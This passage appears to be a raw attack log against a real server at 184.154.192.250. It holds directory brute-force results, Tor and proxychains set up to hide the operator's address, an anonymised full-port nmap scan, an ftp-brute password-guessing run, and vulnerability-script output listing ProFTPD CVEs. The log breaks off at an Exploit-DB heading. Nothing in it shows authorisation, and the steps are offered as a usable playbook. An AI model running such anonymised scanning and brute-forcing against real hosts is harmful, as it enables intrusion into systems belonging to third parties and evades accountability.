  1252. + http://184.154.192.250/blog/uncategorized/rss2 (CODE:301|SIZE:0)
  1253.  
  1254. ---- Entering directory: http://184.154.192.250/blog/wp-admin/ ----
  1255. + http://184.154.192.250/blog/wp-admin/admin.php (CODE:302|SIZE:0)
  1256. + http://184.154.192.250/blog/wp-admin/admin.pl (CODE:403|SIZE:954)
  1257. + http://184.154.192.250/blog/wp-admin/index.php (CODE:302|SIZE:0)
  1258.  
  1259. ---- Entering directory: http://184.154.192.250/blog/wp-content/ ----
  1260. + http://184.154.192.250/blog/wp-content/admin.pl (CODE:403|SIZE:954)
  1261. + http://184.154.192.250/blog/wp-content/index.php (CODE:200|SIZE:0)
  1262.  
  1263. ---- Entering directory: http://184.154.192.250/blog/wp-includes/ ----
  1264. + http://184.154.192.250/blog/wp-includes/admin.pl (CODE:403|SIZE:954)
  1265. + http://184.154.192.250/blog/wp-includes/index.php (CODE:301|SIZE:0)
  1266.  
  1267. ---- Entering directory: http://184.154.192.250/Blog/0/ ----
  1268. + http://184.154.192.250/Blog/0/index.php (CODE:301|SIZE:0)
  1269.  
  1270. ---- Entering directory: http://184.154.192.250/Blog/2011/ ----
  1271. + http://184.154.192.250/Blog/2011/13 (CODE:200|SIZE:13756)
  1272. + http://184.154.192.250/Blog/2011/14 (CODE:200|SIZE:13756)
  1273. + http://184.154.192.250/Blog/2011/15 (CODE:200|SIZE:13756)
  1274. + http://184.154.192.250/Blog/2011/20 (CODE:200|SIZE:13756)
  1275. + http://184.154.192.250/Blog/2011/21 (CODE:200|SIZE:13756)
  1276. + http://184.154.192.250/Blog/2011/22 (CODE:200|SIZE:13756)
  1277. + http://184.154.192.250/Blog/2011/23 (CODE:200|SIZE:13756)
  1278. + http://184.154.192.250/Blog/2011/24 (CODE:200|SIZE:13756)
  1279. + http://184.154.192.250/Blog/2011/25 (CODE:200|SIZE:13756)
  1280. + http://184.154.192.250/Blog/2011/30 (CODE:200|SIZE:13756)
  1281. + http://184.154.192.250/Blog/2011/32 (CODE:200|SIZE:13756)
  1282. + http://184.154.192.250/Blog/2011/42 (CODE:200|SIZE:13756)
  1283. + http://184.154.192.250/Blog/2011/50 (CODE:200|SIZE:13756)
  1284. + http://184.154.192.250/Blog/2011/51 (CODE:200|SIZE:13756)
  1285. + http://184.154.192.250/Blog/2011/64 (CODE:200|SIZE:13756)
  1286. + http://184.154.192.250/Blog/2011/96 (CODE:200|SIZE:13756)
  1287. + http://184.154.192.250/Blog/2011/atom (CODE:301|SIZE:0)
  1288. + http://184.154.192.250/Blog/2011/index.php (CODE:301|SIZE:0)
  1289. + http://184.154.192.250/Blog/2011/page1 (CODE:301|SIZE:0)
  1290. + http://184.154.192.250/Blog/2011/page2 (CODE:301|SIZE:0)
  1291. + http://184.154.192.250/Blog/2011/rdf (CODE:301|SIZE:0)
  1292. + http://184.154.192.250/Blog/2011/rss (CODE:301|SIZE:0)
  1293. + http://184.154.192.250/Blog/2011/rss2 (CODE:301|SIZE:0)
  1294.  
  1295. ---- Entering directory: http://184.154.192.250/Blog/2012/ ----
  1296. + http://184.154.192.250/Blog/2012/13 (CODE:200|SIZE:13756)
  1297. + http://184.154.192.250/Blog/2012/14 (CODE:200|SIZE:13756)
  1298. + http://184.154.192.250/Blog/2012/15 (CODE:200|SIZE:13756)
  1299. + http://184.154.192.250/Blog/2012/20 (CODE:200|SIZE:13756)
  1300. + http://184.154.192.250/Blog/2012/21 (CODE:200|SIZE:13756)
  1301. + http://184.154.192.250/Blog/2012/22 (CODE:200|SIZE:13756)
  1302. + http://184.154.192.250/Blog/2012/23 (CODE:200|SIZE:13756)
  1303. + http://184.154.192.250/Blog/2012/24 (CODE:200|SIZE:13756)
  1304. + http://184.154.192.250/Blog/2012/25 (CODE:200|SIZE:13756)
  1305. + http://184.154.192.250/Blog/2012/30 (CODE:200|SIZE:13756)
  1306. + http://184.154.192.250/Blog/2012/32 (CODE:200|SIZE:13756)
  1307. + http://184.154.192.250/Blog/2012/42 (CODE:200|SIZE:13756)
  1308. + http://184.154.192.250/Blog/2012/50 (CODE:200|SIZE:13756)
  1309. + http://184.154.192.250/Blog/2012/51 (CODE:200|SIZE:13756)
  1310. + http://184.154.192.250/Blog/2012/64 (CODE:200|SIZE:13756)
  1311. + http://184.154.192.250/Blog/2012/96 (CODE:200|SIZE:13756)
  1312. + http://184.154.192.250/Blog/2012/atom (CODE:301|SIZE:0)
  1313. + http://184.154.192.250/Blog/2012/index.php (CODE:301|SIZE:0)
  1314. + http://184.154.192.250/Blog/2012/page1 (CODE:301|SIZE:0)
  1315. + http://184.154.192.250/Blog/2012/page2 (CODE:301|SIZE:0)
  1316. + http://184.154.192.250/Blog/2012/rdf (CODE:301|SIZE:0)
  1317. + http://184.154.192.250/Blog/2012/rss (CODE:301|SIZE:0)
  1318. + http://184.154.192.250/Blog/2012/rss2 (CODE:301|SIZE:0)
  1319.  
  1320. ---- Entering directory: http://184.154.192.250/Blog/embed/ ----
  1321. + http://184.154.192.250/Blog/embed/index.php (CODE:301|SIZE:0)
  1322.  
  1323. ---- Entering directory: http://184.154.192.250/Blog/feed/ ----
  1324. + http://184.154.192.250/Blog/feed/feed (CODE:301|SIZE:0)
  1325. + http://184.154.192.250/Blog/feed/index.php (CODE:301|SIZE:0)
  1326. + http://184.154.192.250/Blog/feed/rss (CODE:301|SIZE:0)
  1327. + http://184.154.192.250/Blog/feed/rss2 (CODE:301|SIZE:0)
  1328.  
  1329. ---- Entering directory: http://184.154.192.250/Blog/uncategorized/ ----
  1330. + http://184.154.192.250/Blog/uncategorized/atom (CODE:301|SIZE:0)
  1331. + http://184.154.192.250/Blog/uncategorized/index.php (CODE:301|SIZE:0)
  1332. + http://184.154.192.250/Blog/uncategorized/page1 (CODE:301|SIZE:0)
  1333. + http://184.154.192.250/Blog/uncategorized/rdf (CODE:301|SIZE:0)
  1334. + http://184.154.192.250/Blog/uncategorized/rss (CODE:301|SIZE:0)
  1335. + http://184.154.192.250/Blog/uncategorized/rss2 (CODE:301|SIZE:0)
  1336.  
  1337. ---- Entering directory: http://184.154.192.250/contact-us/_notes/ ----
  1338. + http://184.154.192.250/contact-us/_notes/admin.pl (CODE:403|SIZE:954)
  1339. + http://184.154.192.250/contact-us/_notes/atom (CODE:301|SIZE:0)
  1340. + http://184.154.192.250/contact-us/_notes/index.php (CODE:301|SIZE:0)
  1341. + http://184.154.192.250/contact-us/_notes/rdf (CODE:301|SIZE:0)
  1342. + http://184.154.192.250/contact-us/_notes/rss (CODE:301|SIZE:0)
  1343. + http://184.154.192.250/contact-us/_notes/rss2 (CODE:301|SIZE:0)
  1344.  
  1345. ---- Entering directory: http://184.154.192.250/feed/atom/ ----
  1346. + http://184.154.192.250/feed/atom/atom (CODE:301|SIZE:0)
  1347. + http://184.154.192.250/feed/atom/feed (CODE:301|SIZE:0)
  1348. + http://184.154.192.250/feed/atom/index.php (CODE:301|SIZE:0)
  1349. + http://184.154.192.250/feed/atom/rdf (CODE:301|SIZE:0)
  1350. + http://184.154.192.250/feed/atom/rss (CODE:301|SIZE:0)
  1351. + http://184.154.192.250/feed/atom/rss2 (CODE:301|SIZE:0)
  1352.  
  1353. ---- Entering directory: http://184.154.192.250/feed/rdf/ ----
  1354. + http://184.154.192.250/feed/rdf/atom (CODE:301|SIZE:0)
  1355. + http://184.154.192.250/feed/rdf/feed (CODE:301|SIZE:0)
  1356. + http://184.154.192.250/feed/rdf/index.php (CODE:301|SIZE:0)
  1357. + http://184.154.192.250/feed/rdf/rdf (CODE:301|SIZE:0)
  1358. + http://184.154.192.250/feed/rdf/rss (CODE:301|SIZE:0)
  1359. + http://184.154.192.250/feed/rdf/rss2 (CODE:301|SIZE:0)
  1360.  
  1361. ---- Entering directory: http://184.154.192.250/include/_notes/ ----
  1362. + http://184.154.192.250/include/_notes/admin.pl (CODE:403|SIZE:954)
  1363. + http://184.154.192.250/include/_notes/atom (CODE:301|SIZE:0)
  1364. + http://184.154.192.250/include/_notes/index.php (CODE:301|SIZE:0)
  1365. + http://184.154.192.250/include/_notes/rdf (CODE:301|SIZE:0)
  1366. + http://184.154.192.250/include/_notes/rss (CODE:301|SIZE:0)
  1367. + http://184.154.192.250/include/_notes/rss2 (CODE:301|SIZE:0)
  1368.  
  1369. ---- Entering directory: http://184.154.192.250/test/file/ ----
  1370. + http://184.154.192.250/test/file/admin.pl (CODE:403|SIZE:954)
  1371. + http://184.154.192.250/test/file/atom (CODE:301|SIZE:0)
  1372. + http://184.154.192.250/test/file/index.php (CODE:301|SIZE:0)
  1373. + http://184.154.192.250/test/file/rdf (CODE:301|SIZE:0)
  1374. + http://184.154.192.250/test/file/rss (CODE:301|SIZE:0)
  1375. + http://184.154.192.250/test/file/rss2 (CODE:301|SIZE:0)
  1376.  
  1377. ---- Entering directory: http://184.154.192.250/test/images/ ----
  1378. + http://184.154.192.250/test/images/admin.pl (CODE:403|SIZE:954)
  1379. + http://184.154.192.250/test/images/atom (CODE:301|SIZE:0)
  1380. + http://184.154.192.250/test/images/index.php (CODE:301|SIZE:0)
  1381. + http://184.154.192.250/test/images/rdf (CODE:301|SIZE:0)
  1382. + http://184.154.192.250/test/images/rss (CODE:301|SIZE:0)
  1383. + http://184.154.192.250/test/images/rss2 (CODE:301|SIZE:0)
  1384. + http://184.154.192.250/test/images/Thumbs.db (CODE:200|SIZE:27648)
  1385.  
  1386. ---- Entering directory: http://184.154.192.250/time/Image/ ----
  1387. + http://184.154.192.250/time/Image/admin.pl (CODE:403|SIZE:954)
  1388. + http://184.154.192.250/time/Image/atom (CODE:301|SIZE:0)
  1389. + http://184.154.192.250/time/Image/index.php (CODE:301|SIZE:0)
  1390. + http://184.154.192.250/time/Image/rdf (CODE:301|SIZE:0)
  1391. + http://184.154.192.250/time/Image/rss (CODE:301|SIZE:0)
  1392. + http://184.154.192.250/time/Image/rss2 (CODE:301|SIZE:0)
  1393.  
  1394. ---- Entering directory: http://184.154.192.250/uncategorized/feed/ ----
  1395. + http://184.154.192.250/uncategorized/feed/feed (CODE:301|SIZE:0)
  1396. + http://184.154.192.250/uncategorized/feed/index.php (CODE:301|SIZE:0)
  1397. + http://184.154.192.250/uncategorized/feed/rss (CODE:301|SIZE:0)
  1398. + http://184.154.192.250/uncategorized/feed/rss2 (CODE:301|SIZE:0)
  1399.  
  1400. ---- Entering directory: http://184.154.192.250/WEB-INF/classes/ ----
  1401. + http://184.154.192.250/WEB-INF/classes/admin.pl (CODE:403|SIZE:954)
  1402. + http://184.154.192.250/WEB-INF/classes/atom (CODE:301|SIZE:0)
  1403. + http://184.154.192.250/WEB-INF/classes/index.php (CODE:301|SIZE:0)
  1404. + http://184.154.192.250/WEB-INF/classes/rdf (CODE:301|SIZE:0)
  1405. + http://184.154.192.250/WEB-INF/classes/rss (CODE:301|SIZE:0)
  1406. + http://184.154.192.250/WEB-INF/classes/rss2 (CODE:301|SIZE:0)
  1407.  
  1408. ---- Entering directory: http://184.154.192.250/WEB-INF/lib/ ----
  1409. + http://184.154.192.250/WEB-INF/lib/admin.pl (CODE:403|SIZE:954)
  1410. + http://184.154.192.250/WEB-INF/lib/atom (CODE:301|SIZE:0)
  1411. + http://184.154.192.250/WEB-INF/lib/index.php (CODE:301|SIZE:0)
  1412. + http://184.154.192.250/WEB-INF/lib/rdf (CODE:301|SIZE:0)
  1413. + http://184.154.192.250/WEB-INF/lib/rss (CODE:301|SIZE:0)
  1414. + http://184.154.192.250/WEB-INF/lib/rss2 (CODE:301|SIZE:0)
  1415.  
  1416. ---- Entering directory: http://184.154.192.250/works/flash/ ----
  1417. + http://184.154.192.250/works/flash/admin.pl (CODE:403|SIZE:954)
  1418. + http://184.154.192.250/works/flash/atom (CODE:301|SIZE:0)
  1419. + http://184.154.192.250/works/flash/index.php (CODE:301|SIZE:0)
  1420. + http://184.154.192.250/works/flash/rdf (CODE:301|SIZE:0)
  1421. + http://184.154.192.250/works/flash/rss (CODE:301|SIZE:0)
  1422. + http://184.154.192.250/works/flash/rss2 (CODE:301|SIZE:0)
  1423.  
  1424. ---- Entering directory: http://184.154.192.250/works/images/ ----
  1425. + http://184.154.192.250/works/images/admin.pl (CODE:403|SIZE:954)
  1426. + http://184.154.192.250/works/images/atom (CODE:301|SIZE:0)
  1427.  
  1428.  
  1429.  
  1430. INSTALL TOR
  1431.  
  1432. root@blackbox:~# apt-get install tor
  1433.  
  1434. START TOR
  1435.  
  1436. root@blackbox:~# service tor start
  1437.  
  1438. CHECK TOR STATUS
  1439.  
  1440. root@blackbox:~# service tor status
  1441.  
  1442.  
  1443. CHECK IF ANONYMITY WORKS
  1444.  
  1445. root@blackbox:~# proxychains curl http://icanhazip.com
  1446. ProxyChains-3.1 (http://proxychains.sf.net)
  1447. |DNS-request| icanhazip.com
  1448. |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
  1449. |DNS-response| icanhazip.com is 104.20.16.242
  1450. |S-chain|-<>-127.0.0.1:9050-<><>-104.20.16.242:80-<><>-OK
  1451. 89.234.157.254
  1452.  
  1453.  
  1454. START NMAP THROUGH PROXYCHAINS
  1455.  
  1456. root@blackbox:/opt# proxychains nmap -p 1-65535 -T4 -A -v 184.154.192.250 -Pn --open
  1457.  
  1458. Discovered open port 443/tcp on 184.154.192.250
  1459. Discovered open port 110/tcp on 184.154.192.250
  1460. Discovered open port 995/tcp on 184.154.192.250
  1461. Discovered open port 53/tcp on 184.154.192.250
  1462. Discovered open port 111/tcp on 184.154.192.250
  1463. Discovered open port 554/tcp on 184.154.192.250
  1464. Discovered open port 143/tcp on 184.154.192.250
  1465. Discovered open port 22/tcp on 184.154.192.250
  1466. Discovered open port 25/tcp on 184.154.192.250
  1467. Discovered open port 993/tcp on 184.154.192.250
  1468. Discovered open port 3306/tcp on 184.154.192.250
  1469. Discovered open port 80/tcp on 184.154.192.250
  1470. Discovered open port 587/tcp on 184.154.192.250
  1471. Discovered open port 21/tcp on 184.154.192.250
  1472. Discovered open port 106/tcp on 184.154.192.250
  1473. Discovered open port 746/tcp on 184.154.192.250
  1474. Discovered open port 7070/tcp on 184.154.192.250
  1475. Discovered open port 8443/tcp on 184.154.192.250
  1476. Discovered open port 465/tcp on 184.154.192.250
  1477. Discovered open port 8880/tcp on 184.154.192.250
  1478.  
  1479.  
  1480. NMAP NSE FTP
  1481.  
  1482. root@blackbox:/opt# ls /usr/share/nmap/scripts/ | grep ftp
  1483. ftp-anon.nse
  1484. ftp-bounce.nse
  1485. ftp-brute.nse
  1486. ftp-libopie.nse
  1487. ftp-proftpd-backdoor.nse
  1488. ftp-syst.nse
  1489. ftp-vsftpd-backdoor.nse
  1490. ftp-vuln-cve2010-4221.nse
  1491. tftp-enum.nse
  1492.  
  1493. root@blackbox:/opt# proxychains nmap -oN ftp.nmap --script "ftp-brute" --script-args= -d -Pn -v -p 21 184.154.192.250
  1494.  
  1495. PORT STATE SERVICE REASON
  1496. 21/tcp open ftp syn-ack ttl 49
  1497. | ftp-brute:
  1498. | Accounts: No valid accounts found
  1499. |_ Statistics: Performed 563 guesses in 618 seconds, average tps: 1.1
  1500. Final times for host: srtt: 145410 rttvar: 145410 to: 727050
  1501.  
  1502.  
  1503. root@blackbox:~# nmap -sV -Pn 184.154.192.250 --open
  1504. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:21 CST
  1505. Nmap scan report for server.etours.cn (184.154.192.250)
  1506. Host is up (0.15s latency).
  1507. Not shown: 981 closed ports, 1 filtered port
  1508. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1509. PORT STATE SERVICE VERSION
  1510. 21/tcp open ftp ProFTPD 1.3.3e
  1511. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1512. 25/tcp open smtp qmail smtpd
  1513. 53/tcp open domain (unknown banner: none)
  1514. 80/tcp open http Apache httpd (PleskLin)
  1515. 106/tcp open pop3pw poppassd
  1516. 110/tcp open pop3 Courier pop3d
  1517. 111/tcp open rpcbind 2 (RPC #100000)
  1518. 143/tcp open imap Courier Imapd (released 2004)
  1519. 443/tcp open ssl/https?
  1520. 465/tcp open ssl/smtps?
  1521. 554/tcp open tcpwrapped
  1522. 587/tcp open smtp qmail smtpd
  1523. 993/tcp open ssl/imaps?
  1524. 995/tcp open ssl/pop3s?
  1525. 3306/tcp open mysql MySQL 5.0.77
  1526. 7070/tcp open tcpwrapped
  1527. 8443/tcp open ssl/https-alt sw-cp-server
  1528. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1529. SF-Port53-TCP:V=7.80%I=7%D=1/22%Time=5E28AEC7%P=x86_64-pc-linux-gnu%r(DNSV
  1530. SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
  1531. SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
  1532. SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
  1533. Service Info: Host: localhost.localdomain; OS: Unix
  1534.  
  1535. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1536. Nmap done: 1 IP address (1 host up) scanned in 39.36 seconds
  1537.  
  1538.  
  1539. root@blackbox:/opt# cd /usr/share/nmap/scripts/
  1540. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-vulners.git
  1541. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.git
  1542. root@blackbox:/usr/share/nmap/scripts# ls -la vulscan/*.csv
  1543. -rw-r--r-- 1 root root 16756993 Jan 21 04:59 vulscan/cve.csv
  1544. -rw-r--r-- 1 root root 1864748 Jan 21 04:59 vulscan/exploitdb.csv
  1545. -rw-r--r-- 1 root root 1524310 Jan 21 04:59 vulscan/openvas.csv
  1546. -rw-r--r-- 1 root root 6718903 Jan 21 04:59 vulscan/osvdb.csv
  1547. -rw-r--r-- 1 root root 7001128 Jan 21 04:59 vulscan/scipvuldb.csv
  1548. -rw-r--r-- 1 root root 7227028 Jan 21 04:59 vulscan/securityfocus.csv
  1549. -rw-r--r-- 1 root root 1826138 Jan 21 04:59 vulscan/securitytracker.csv
  1550. -rw-r--r-- 1 root root 4576711 Jan 21 04:59 vulscan/xforce.csv
  1551.  
  1552. root@blackbox:/usr/share/nmap/scripts# cd vulscan/
  1553. root@blackbox:/usr/share/nmap/scripts/vulscan# cd utilities/
  1554. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd updater/
  1555. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# chmod +x updateFiles.sh
  1556. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# ./updateFiles.sh
  1557. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/cve.csv...
  1558. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/exploitdb.csv...
  1559. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/openvas.csv...
  1560. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/osvdb.csv...
  1561. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/scipvuldb.csv...
  1562. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securityfocus.csv...
  1563. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securitytracker.csv...
  1564. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/xforce.csv...
  1565. Returning 0, as no files have been updated, but script ran successfully
  1566.  
  1567.  
  1568. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# cd ..
  1569. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd ..
  1570. root@blackbox:/usr/share/nmap/scripts/vulscan# cd ..
  1571.  
  1572.  
  1573. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p21 184.154.192.250
  1574. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1575. Nmap scan report for server.etours.cn (184.154.192.250)
  1576. Host is up (0.037s latency).
  1577.  
  1578. PORT STATE SERVICE VERSION
  1579. 21/tcp open ftp ProFTPD 1.3.3e
  1580. Service Info: OS: Unix
  1581.  
  1582. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1583. Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds
  1584.  
  1585. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p22 184.154.192.250
  1586. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1587. Nmap scan report for server.etours.cn (184.154.192.250)
  1588. Host is up (0.036s latency).
  1589.  
  1590. PORT STATE SERVICE VERSION
  1591. 22/tcp open tcpwrapped
  1592.  
  1593. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1594. Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
  1595.  
  1596.  
  1597. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p21 184.154.192.250
  1598. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1599. Nmap scan report for server.etours.cn (184.154.192.250)
  1600. Host is up (0.036s latency).
  1601.  
  1602. PORT STATE SERVICE VERSION
  1603. 21/tcp open ftp ProFTPD 1.3.3e
  1604. | vulscan: VulDB - https://vuldb.com:
  1605. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  1606. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  1607. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  1608. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  1609. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  1610. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  1611. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  1612. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  1613. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  1614. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  1615. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  1616. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  1617. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  1618. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  1619. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  1620. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  1621. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  1622. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  1623. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  1624. |
  1625. | MITRE CVE - https://cve.mitre.org:
  1626. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  1627. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  1628. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  1629. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  1630. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  1631. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  1632. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  1633. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  1634. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  1635. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  1636. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  1637. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  1638. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  1639. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  1640. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  1641. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  1642. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  1643. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  1644. |
  1645. | SecurityFocus - https://www.securityfocus.com/bid/:
  1646. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1647. |
  1648. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1649. | [80980] ProFTPD FTP commands symlink
  1650. | [71226] ProFTPD pool code execution
  1651. | [65207] ProFTPD mod_sftp module denial of service
  1652. | [64495] ProFTPD sql_prepare_where() buffer overflow
  1653. | [63658] ProFTPD FTP server backdoor
  1654. | [63407] mod_sql module for ProFTPD buffer overflow
  1655. | [63155] ProFTPD pr_data_xfer denial of service
  1656. | [62909] ProFTPD mod_site_misc directory traversal
  1657. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  1658. | [53936] ProFTPD mod_tls SSL certificate security bypass
  1659. | [48951] ProFTPD mod_sql username percent SQL injection
  1660. | [48558] ProFTPD NLS support SQL injection protection bypass
  1661. | [45274] ProFTPD URL cross-site request forgery
  1662. | [33733] ProFTPD Auth API security bypass
  1663. | [31461] ProFTPD mod_radius buffer overflow
  1664. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  1665. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  1666. | [30147] ProFTPD sreplace() buffer overflow
  1667. | [21530] ProFTPD mod_sql format string attack
  1668. | [21528] ProFTPD shutdown message format string attack
  1669. | [19410] GProFTPD file name format string attack
  1670. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  1671. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  1672. | [16038] ProFTPD CIDR entry ACL bypass
  1673. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  1674. | [12369] ProFTPD mod_sql SQL injection
  1675. | [12200] ProFTPD ASCII file newline buffer overflow
  1676. | [10932] ProFTPD long PASS command buffer overflow
  1677. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  1678. | [7818] ProFTPD ls &quot
  1679. | [7816] ProFTPD file globbing denial of service
  1680. | [7126] ProFTPD fails to resolve hostnames
  1681. | [6433] ProFTPD format string
  1682. | [6209] proFTPD /var symlink
  1683. | [6208] ProFTPD contains configuration error in postinst script when running as root
  1684. | [5801] proftpd memory leak when using SIZE or USER commands
  1685. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  1686. |
  1687. | Exploit-DB - https://www.exploit-db.com:
